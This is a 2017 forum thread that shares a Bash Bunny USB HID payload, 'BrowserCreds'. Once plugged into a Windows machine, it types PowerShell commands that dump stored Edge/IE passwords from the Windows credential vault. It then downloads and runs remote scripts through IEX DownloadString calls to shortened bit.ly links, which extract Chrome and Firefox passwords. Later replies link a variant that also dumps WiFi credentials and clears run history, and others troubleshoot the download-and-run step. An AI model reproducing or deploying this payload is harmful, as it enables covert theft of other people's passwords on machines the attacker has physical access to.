illwill Posted March 16, 2017 Posted March 16, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote
Mohamed A. Baset Posted March 16, 2017 Posted March 16, 2017 13 minutes ago, illwill said: Was thinking of ways to dump browsercreds without the use Nirsoft programs, so screwing around with some powershell and some scripts i found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses powershell to webdl the scripts into memory and execute and store the results \loot\BrowserCreds\%computername%.txt. Tested on Win10 with Delays that worked for my laptop , so may need adjusting, let me know of any errors you come across https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt #!/bin/bash # # Title: BrowserCreds # Author: illwill # Version: 0.1 # # Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script # then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName% # Credits to these guys for their powershell scripts: # https://github.com/sekirkity/BrowserGather BrowserGather.ps1 # https://github.com/EmpireProject/Empire Get-FoxDump.ps1 #script # Blue...............Running Script # Purple.............Got Browser Creds LED R 200 LOOTDIR=/root/udisk/loot/BrowserCreds mkdir -p $LOOTDIR ATTACKMODE HID STORAGE LED B 200 # wait 6 seconds for the storage to popup Q DELAY 6000 Q GUI r Q DELAY 100 Q STRING POWERSHELL Q ENTER Q DELAY 500 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 #Dump Credential Vault (I.E./Edge) Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\; Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \| Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt Q ENTER Q DELAY 100 #Dump Chrome Creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER Q DELAY 2000 #Open 32bit powershell and Dump Firefox Creds Q GUI r Q DELAY 100 Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Q ENTER Q DELAY 2000 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER LED R B 200 sync Cool script @illwill but It's prefered to use sync before LEDding Quote
illwill Posted March 16, 2017 Author Posted March 16, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote
qdba Posted March 20, 2017 Posted March 20, 2017 (edited) Good stuff. Did some changes to your script like - Minimize Powershell windows - Dump WiFi creds - Clear Run History https://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt Edited March 20, 2017 by qdba Quote
henna3 Posted March 20, 2017 Posted March 20, 2017 1 hour ago, qdba said: Good stuff. Did some changes to your script like - Minimize Powershell windows - Dump WiFi creds - Clear Run History https://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt You have one for the usb rubber ducky aswell? Hehe Quote
Epoc Posted March 20, 2017 Posted March 20, 2017 12 minutes ago, henna3 said: You have one for the usb rubber ducky aswell? Hehe Here's what you're looking for : Quote
calin42 Posted May 17, 2017 Posted May 17, 2017 Hello, i have this problem : Get-ChromeCreds : Le terme «Get-ChromeCreds» n'est pas reconnu comme nom d'applet de commande, fonction, fichier de script ou programme exécutable. Vérifiez l'orthographe du nom, ou si un chemin d'accès existe, vérifiez que le chemin d'accès est correct et réessayez. Au caractère Ligne:2 : 73 + ... ent).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds | ft Us ... + ~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Get-ChromeCreds:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException So, i isolated the probleme : this line : "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds" And its working perfectly. But not with the script. Little translation, it says that Get-ChromeCreds is not a valid function, which i think means he failed to download. But idk why its working when i execute the line myself, and not when the script does it. Thx for help :) Quote
HeadScratchCode Posted June 4, 2017 Posted June 4, 2017 I think I'm having the same issue as the comment above, but I'm unsure how to fix it. Successfully continuing past the IEX string fails. The image below displays the problem. Would be graterful for any help in finding a solution. Thanks, guys. Quote
b0N3z Posted June 23, 2017 Posted June 23, 2017 if you go to the github, dumpcreds 2.2 is in the pull request section and it works great for browser creds. :) Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.